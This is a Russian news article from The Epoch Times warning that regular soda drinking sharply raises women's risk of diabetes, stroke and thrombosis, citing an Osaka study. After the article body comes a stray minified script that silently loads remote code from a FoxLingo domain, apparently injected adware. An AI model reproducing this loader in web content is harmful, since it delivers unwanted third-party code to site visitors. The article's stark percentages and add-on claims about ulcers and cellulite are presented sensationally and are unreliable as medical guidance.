Самый опасный напиток для женщин

The Epoch Times04.11.2012 Обновлено: 06.09.2021 14:13
Новости. Япония, 4 ноября. Японские учёные выявили самый опасный напиток для женского организма, сообщает The American Journal of Clinical Nutrition.
Самый опасный напиток для женщин
Фото: Michael Loccisano/Getty Images for Cytosport
Учёные Университета Осаки в течение 18 лет отслеживали изменения в организме 40 тысяч добровольцев. Испытуемые были поделены на 4 группы в зависимости от уровня пристрастия к газированным напиткам.

Исследования показали, что женщины, часто употребляющие обычные газированные напитки, на 83% чаще становятся жертвами диабета и инсульта. Это вызвано нарушением обмена веществ, повышением уровня сахара и жиров в крови и артериального давления. Как оказалось, в большей степени такие негативные последствия имеет именно женский организм.

Выяснилось, что употребление даже одного стакана газировки в день на 80% повышает риск развития тромбоза у женщин.

Помимо сердечнососудистых заболеваний, газированные напитки приводят и к другим известным негативным последствиям: язва желудка, обезвоживание организма, остеопороз (истончение костной ткани в результате снижения в организме кальция) и др. Как известно, диетологи рекомендуют исключить из рациона газированные напитки также и при борьбе с целлюлитом.

Прежде чем употреблять, казалось бы, самые обычные напитки с красивой этикеткой, задумайтесь… Ведь красивая реклама не является показателем высокого качества продукта и гарантом вашего здоровья.

!function(){try{var h=document.getElementsByTagName(«head»)[0];var s=document.createElement(«script»);s.src=»//edge.crtinv.com/products/FoxLingo/default/snippet.js»;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==»loaded» || this.readyState==»complete»){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Комментарии
Дорогие читатели,

мы приветствуем любые комментарии, кроме нецензурных.
Раздел модерируется вручную, неподобающие сообщения не будут опубликованы.

С наилучшими пожеланиями, редакция The Epoch Times

Упражения Фалунь Дафа
ВЫБОР РЕДАКТОРА